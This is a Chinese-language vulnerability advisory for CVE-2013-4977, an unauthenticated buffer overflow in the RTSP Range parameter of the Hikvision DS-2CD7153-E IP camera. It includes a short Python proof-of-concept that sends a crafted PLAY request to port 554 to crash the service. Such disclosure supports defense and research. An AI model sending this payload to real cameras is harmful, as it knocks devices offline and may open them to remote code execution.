Hikvision DS-2CD7153-E 网络摄像机远程缓冲区溢出漏洞（CVE-2013-4977）

发布日期：2013-08-06
更新日期：2013-08-08受影响系统：
hikvision DS-2CD7153-E IP Camera v4.1.0 b130111
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 61642
CVE（CAN） ID: CVE-2013-4977Hikvision DS-2CD7153-E是日夜型防水防暴迷你半球网络摄像机。Hikvision DS-2CD7153-E固件版本4.1.0 b130111在处理RTSP事务的Range参数时，精心构造的报文会触发缓冲区溢出，造成处理通讯的进程崩溃，Watchdog服务重启。无需身份验证即可利用此漏洞，也有可能导致远程代码执行。<*来源：Anibal Sacco

链接：http://corelabs.coresecurity.com/index.php？module=Wiki&action=view&type=advisory&name=CORE-2013-0708
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！import socketHOST = "X.X.X.X"
PORT = 554
s = socket.socket（socket.AF_INET, socket.SOCK_STREAM）
s.connect（（HOST, PORT））trigger_pkt = "PLAY rtsp://%s/ RTSP/1.0 " % HOST
trigger_pkt += "CSeq: 7 "
trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS "
trigger_pkt += "User-Agent: VLC media player （LIVE555 Streaming Media v2010.02.10） "s.sendall（trigger_pkt）
print "Packet sent"
data = s.recv（1024）
print "Received", repr（data）, " "
s.close（）建议：
--------------------------------------------------------------------------------
厂商补丁：hikvision
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.hikvision.com/en/products_show.asp？id=506Linux C编写木马程序盗取root用户密码OpenStack Nova安全绕过漏洞（CVE-2013-2256）相关资讯 Hikvision DS-2CD7153-E

Hikvision DS-2CD7153-E 网络摄像（08/09/2013 08:14:26）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规